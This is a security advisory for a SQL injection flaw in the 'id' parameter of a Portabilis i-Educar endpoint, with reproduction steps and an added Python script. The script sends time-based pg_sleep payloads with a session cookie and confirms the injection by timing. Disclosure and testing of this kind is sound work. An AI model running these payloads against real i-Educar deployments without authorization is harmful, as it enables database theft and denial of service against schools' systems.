Portabilis i-Educar
cpe:2.3:a:portabilis:i-educar:*:*:*:*:*:*:*
- <= 2.10
A SQL injection vulnerability has been identified in the Portabilis i-Educar application, affecting versions up to and including 2.10. The flaw lies in the 'id' parameter of the '/module/AreaConhecimento/view' endpoint, whose value reaches a query against the backend database. An authenticated remote attacker can use it to execute arbitrary SQL commands on that database. Exploitation requires an account with permission to create or list items in the 'Escola' menu; unauthenticated users cannot reach the affected endpoint.
Successful exploitation gives unauthorized access to stored data, including sensitive information such as credentials and personal details. It also enables database enumeration and manipulation of database records, and the same injection point can be used for denial of service, since time-based payloads make the server stall for as long as the injected delay on every request. Escalation to remote code execution is possible only where the database user exposed to the application has access to specific database features that allow it; the advisory does not claim such features are present by default.
To reproduce this vulnerability, log in with a suitably privileged account and navigate to 'Escola > Cadastros > Tipos > Regras de Avaliação > Listagem de áreas de conhecimento', the page that calls the affected endpoint. Then send a GET request to '/module/AreaConhecimento/view' with a crafted 'id' parameter containing a SQL payload that introduces a delay. Record the response time of an unmodified request first, then compare it with the response time of the injected request: a consistent increase that matches the requested delay, and that grows when the delay is increased, confirms the SQL injection. A single slow response is not sufficient evidence, because network jitter or server load can produce the same symptom.
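The timing comparison described above, as an added example that is not part of the advisory and not i-Educar project code. It assumes a PostgreSQL backend (so the delay primitive is pg_sleep; the exact payload syntax that the endpoint accepts is not given by the advisory and must be adapted), an authenticated session cookie for an account allowed to list items under 'Escola', and a base URL; only the endpoint path and the 'id' parameter name come from the advisory. The check takes a baseline, requires every injected request to exceed the slowest baseline request by most of the requested delay, and requires the delay to scale with the sleep value, so a single slow response or a loaded server does not produce a false positive. A simulated sender with constructed timings lets the logic run offline.

```python
"""Time-based blind SQL injection check with a baseline and a scaling test.

Added example; the endpoint path and parameter name are from the advisory,
everything else (payload form, URL, cookie) is an assumption to adapt.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request
from typing import Callable, List

ENDPOINT = "/module/AreaConhecimento/view"   # from the advisory
PARAM = "id"                                  # from the advisory
CONTROL_VALUE = "1"                           # assumed harmless id value


def sleep_payload(seconds: int) -> str:
    """Assumed PostgreSQL payload: true only after the database has slept.

    Other engines need a different primitive (e.g. SLEEP() on MySQL) and the
    surrounding syntax depends on how the endpoint embeds 'id' in its query.
    """
    return f"1 AND 1=(SELECT 1 FROM pg_sleep({seconds}))"


def http_sender(base_url: str, session_cookie: str,
                timeout: float = 30.0) -> Callable[[str], float]:
    """Return a function that GETs the endpoint with the given id value and
    returns elapsed seconds. The cookie must belong to an account that can
    list items under the 'Escola' menu, as the advisory requires."""
    def send(value: str) -> float:
        query = urllib.parse.urlencode({PARAM: value})
        req = urllib.request.Request(f"{base_url}{ENDPOINT}?{query}",
                                     headers={"Cookie": session_cookie})
        start = time.monotonic()
        try:
            with urllib.request.urlopen(req, timeout=timeout):
                pass
        except OSError:
            # HTTPError, URLError and socket timeouts all subclass OSError;
            # an error page or a timeout still yields a usable elapsed time.
            pass
        return time.monotonic() - start
    return send


def measure(send: Callable[[str], float], value: str, trials: int) -> List[float]:
    """Issue the same request several times and collect the timings."""
    return [send(value) for _ in range(trials)]


def delay_confirmed(control: List[float], injected: List[float],
                    sleep: float) -> bool:
    """Every injected request must exceed the slowest control request by at
    least 80% of the requested sleep; one slow baseline or jittery injected
    sample is therefore not enough to confirm."""
    threshold = max(control) + 0.8 * sleep
    return min(injected) >= threshold


def check_time_based(send: Callable[[str], float], trials: int = 3,
                     short: int = 3, long: int = 6) -> bool:
    """Baseline, then two sleep lengths; confirm only if both delays show up
    and the extra delay tracks the difference between the two sleeps."""
    control = measure(send, CONTROL_VALUE, trials)
    short_runs = measure(send, sleep_payload(short), trials)
    long_runs = measure(send, sleep_payload(long), trials)
    if not (delay_confirmed(control, short_runs, short)
            and delay_confirmed(control, long_runs, long)):
        return False
    growth = statistics.median(long_runs) - statistics.median(short_runs)
    # An overloaded server is slow regardless of the payload; a real
    # injection grows by roughly (long - short) seconds.
    return abs(growth - (long - short)) <= 0.5 * (long - short)


def simulated_sender(vulnerable: bool) -> Callable[[str], float]:
    """Constructed stand-in for http_sender so the logic runs offline:
    0.3 s baseline, plus the requested sleep when 'vulnerable' is set."""
    def send(value: str) -> float:
        if vulnerable and "pg_sleep(" in value:
            seconds = int(value.split("pg_sleep(")[1].split(")")[0])
            return seconds + 0.3
        return 0.3
    return send


if __name__ == "__main__":
    # Offline demo against the constructed senders; for a live target use
    # http_sender("https://host.example", "PHPSESSID=...") instead.
    print("vulnerable target :", check_time_based(simulated_sender(True)))
    print("patched target    :", check_time_based(simulated_sender(False)))
```

Pick sleep values large enough to stand clear of the target's normal latency (3 and 6 seconds is usually enough on a LAN; raise them over a slow link), and keep trials small: each confirmed run stalls a worker for the full sleep, which is exactly the denial-of-service effect the advisory warns about.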